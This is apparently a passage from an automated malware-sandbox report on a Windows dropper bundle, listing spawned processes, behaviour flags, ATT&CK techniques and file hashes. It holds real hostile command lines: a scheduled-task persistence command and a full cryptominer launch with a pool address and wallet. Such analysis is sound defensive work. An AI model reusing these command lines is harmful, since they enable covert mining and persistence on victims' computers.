C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exeC:\Users\Admin\AppData\Local\Temp\0jrt5ohb.jsz\anyname.exe10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive & exit9⤵
-
C:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\pee2ejmm.nk5\gcleaner.exe /mixfive10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9168 -s 24411⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fnkpkf24.saq\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat205eb4a2ece877a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat205eb4a2ece877a.exeSat205eb4a2ece877a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\3411592.exe"C:\ProgramData\3411592.exe"8⤵
-
C:\ProgramData\4888429.exe"C:\ProgramData\4888429.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\4888429.exe"C:\ProgramData\4888429.exe"9⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 10689⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\ProgramData\6470069.exe"C:\ProgramData\6470069.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\7625938.exe"C:\ProgramData\7625938.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4748 -s 17248⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"C:\Users\Admin\AppData\Local\Temp\askinstall58.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMik18.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe"8⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpB35D_tmp.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-RF37F.tmp\setup_2.tmp" /SL5="$5028A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-SNQQ4.tmp\setup_2.tmp" /SL5="$20336,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-UHRB0.tmp\postback.exe" ss111⤵
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20627fa1c49.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20627fa1c49.exeSat20627fa1c49.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4824 -s 3286⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20ed203af5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20ed203af5.exeSat20ed203af5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1389700.scr"C:\Users\Admin\AppData\Roaming\1389700.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\6389059.scr"C:\Users\Admin\AppData\Roaming\6389059.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\3379467.scr"C:\Users\Admin\AppData\Roaming\3379467.scr" /S6⤵
-
C:\Users\Admin\AppData\Roaming\3379467.scr"C:\Users\Admin\AppData\Roaming\3379467.scr"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 860 -s 10687⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5141881.scr"C:\Users\Admin\AppData\Roaming\5141881.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2077373f11706fb7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2077373f11706fb7.exeSat2077373f11706fb7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2026ef0d60b87a3f5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exeSat2026ef0d60b87a3f5.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exeC:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20de8d8504.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20de8d8504.exeSat20de8d8504.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5248 -s 2486⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat200240b71b.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat200240b71b.exeSat200240b71b.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5132 -s 2606⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20545a92617f.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20545a92617f.exeSat20545a92617f.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3824 -s 2446⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20873bc74eb80e0.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 1PsfHjy/6UuX87LF/E3WAg.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20873bc74eb80e0.exeSat20873bc74eb80e0.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4792 -s 18722⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4824 -ip 48241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3824 -ip 38241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5248 -ip 52481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 5132 -ip 51321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5528 -s 4563⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5528 -ip 55281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 860 -ip 8601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 388 -p 4748 -ip 47481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4792 -ip 47921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6352 -ip 63521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 6092 -ip 60921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3652 -ip 36521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 5060 -ip 50601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4280 -ip 42801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4288 -ip 42881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 520 -p 1152 -ip 11521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 3060 -ip 30601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5144 -ip 51441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 5884 -ip 58841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 5324 -ip 53241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7A66.exeC:\Users\Admin\AppData\Local\Temp\7A66.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7A66.exeC:\Users\Admin\AppData\Local\Temp\7A66.exe2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\9C56.exeC:\Users\Admin\AppData\Local\Temp\9C56.exe1⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\9C56.exeC:\Users\Admin\AppData\Local\Temp\9C56.exe2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\CD79.exeC:\Users\Admin\AppData\Local\Temp\CD79.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\37EC.exeC:\Users\Admin\AppData\Local\Temp\37EC.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10000 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\543F.exeC:\Users\Admin\AppData\Local\Temp\543F.exe1⤵
- Adds Run key to start application
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 8992 -s 16882⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 10000 -ip 100001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\798B.exeC:\Users\Admin\AppData\Local\Temp\798B.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 8588 -ip 85881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 776 -p 8992 -ip 89921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 808 -p 9168 -ip 91681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 46455126B97E7A28E5F39C8EA2818575 C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 29E1D0234777D899071C07C529471E9C2⤵
- Blocklisted process makes network request
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 127F402607D5A5E3C083F061F8A8807E E Global\MSI00002⤵
- Loads dropped DLL
- Drops file in Windows directory
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10848 -s 4603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\A2CF.exeC:\Users\Admin\AppData\Local\Temp\A2CF.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 10848 -ip 108481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\BF31.exeC:\Users\Admin\AppData\Local\Temp\BF31.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11564 -s 2602⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\C85A.exeC:\Users\Admin\AppData\Local\Temp\C85A.exe1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 11768 -s 2362⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 11564 -ip 115641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 11768 -ip 117681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Users\Admin\AppData\Local\Temp\41F0.exeC:\Users\Admin\AppData\Local\Temp\41F0.exe1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Modify Registry
3Disabling Security Tools
1Virtualization/Sandbox Evasion
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat200240b71b.exeMD5
e268a668b507c25263cb0b8bb3aeb3be
SHA1e116499e5b99f81580601b780f6018fe5c0a7f65
SHA25682c816980fe9b0de916fc1954a2e1db51011770f794f8fd15a2e84656962e6b7
SHA512543654e296d299febbbf2dd43e565cf4199b3c7cffc8db5ffd490b51c4753d38b080fe72b73e79bbcdb3853227f9198bf6c88a6d230e68a6017d1fbc03c461e4
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat200240b71b.exeMD5
e268a668b507c25263cb0b8bb3aeb3be
SHA1e116499e5b99f81580601b780f6018fe5c0a7f65
SHA25682c816980fe9b0de916fc1954a2e1db51011770f794f8fd15a2e84656962e6b7
SHA512543654e296d299febbbf2dd43e565cf4199b3c7cffc8db5ffd490b51c4753d38b080fe72b73e79bbcdb3853227f9198bf6c88a6d230e68a6017d1fbc03c461e4
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat2026ef0d60b87a3f5.exeMD5
b39390c4c99cb81fceb07a8fc50c0ed8
SHA15c8fd743dc6d3abc2e4f3c8e381c8f572d56acc1
SHA2566e14451c400fc83136bbe8d08d404b038aedb2a7dffa18cf45581b8cc0d78ccd
SHA5129112c0b668e0de8229d7153bcdf993f0f5a7c8fbacf15f2ffcf3012ebc49cd7c1ca961997d1ac2c39ebfa6ccda1e3d2ad08c9bb3c2aee56a9ff38fbe8759c4dd
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20545a92617f.exeMD5
b00df112121b08e3f1efd4f75c851880
SHA18c620d2ef13e65f592c07c520454a2b3ab6b189b
SHA256e6e6e5cfa2221a0e86f13297685d2cdb6e06a47000a6545bfe8971cf24bc04b2
SHA512bf0c8b0ac5719f2a66cfffc86eba47b4fc70e9c075b64ae9f6e5ef006b742c748101a3788d57bc56a239edbcdf7630499cdaba8945acc17a04fd1b0f71337c6b
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20545a92617f.exeMD5
b00df112121b08e3f1efd4f75c851880
SHA18c620d2ef13e65f592c07c520454a2b3ab6b189b
SHA256e6e6e5cfa2221a0e86f13297685d2cdb6e06a47000a6545bfe8971cf24bc04b2
SHA512bf0c8b0ac5719f2a66cfffc86eba47b4fc70e9c075b64ae9f6e5ef006b742c748101a3788d57bc56a239edbcdf7630499cdaba8945acc17a04fd1b0f71337c6b
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20578e6239.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20578e6239.exeMD5
1aecd083bbec326d90698a79f73749d7
SHA11ea884d725caec27aac2b3c0baccfd0c380a414e
SHA256d5ccebea40a76ec2c82cac45cc208a778269e743f1a825ef881533b85d6c1d31
SHA512c1044945b17c8f2063a9b95367db93ad6d0f6e316ad9c3b32d2a2259459098b72f85f5569b5a33f7dae68194697c448617e37b6f24558a7ad9cb53b0f382b064
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat205eb4a2ece877a.exeMD5
63846f6a2c15fb8d0bd80c63d8406aec
SHA1c566c716ed8c3c69f63d866d2c7a041bdf00b4e5
SHA25683664d9745f1f75b770b960a253e5efc0ff4ee06b72083fa8be2bbf801328d3e
SHA51287f0f76b522da421d8ada6ff786be97099439598445663df49791210bd4e29e4b41efe886ab77765ba0d069a1565ba9b7fc2b0b68dc86eebcd62a122a6f59007
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat205eb4a2ece877a.exeMD5
63846f6a2c15fb8d0bd80c63d8406aec
SHA1c566c716ed8c3c69f63d866d2c7a041bdf00b4e5
SHA25683664d9745f1f75b770b960a253e5efc0ff4ee06b72083fa8be2bbf801328d3e
SHA51287f0f76b522da421d8ada6ff786be97099439598445663df49791210bd4e29e4b41efe886ab77765ba0d069a1565ba9b7fc2b0b68dc86eebcd62a122a6f59007
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20627fa1c49.exeMD5
43ec4a753c87d7139503db80562904a7
SHA17f6f36e0a1e122234f109ff0b4c7318486e764e0
SHA256282eb8e7745f9396a2551817e90afbdfe54a77c427c3050fd0ec638fb2f50dc3
SHA512da7f0a19c3d391a87dbc86b49239ad11d052ebedc1856dab2524ed33e98690e209d61376c4e913a5ec0908920ea7204fa0c38123ad95937780c9f3518e4bb9bf
-
C:\Users\Admin\AppData\Local\Temp\7zS48340EF0\Sat20627fa1c49.exeMD5
43ec4a753c87d7139503db80562904a7
SHA17f6f36e0a1e122234f109ff0b4c7318486e764e0
SHA256282eb8e7745f9396a2551817e90afbdfe54a77c427c3050fd0ec638fb2f50dc3
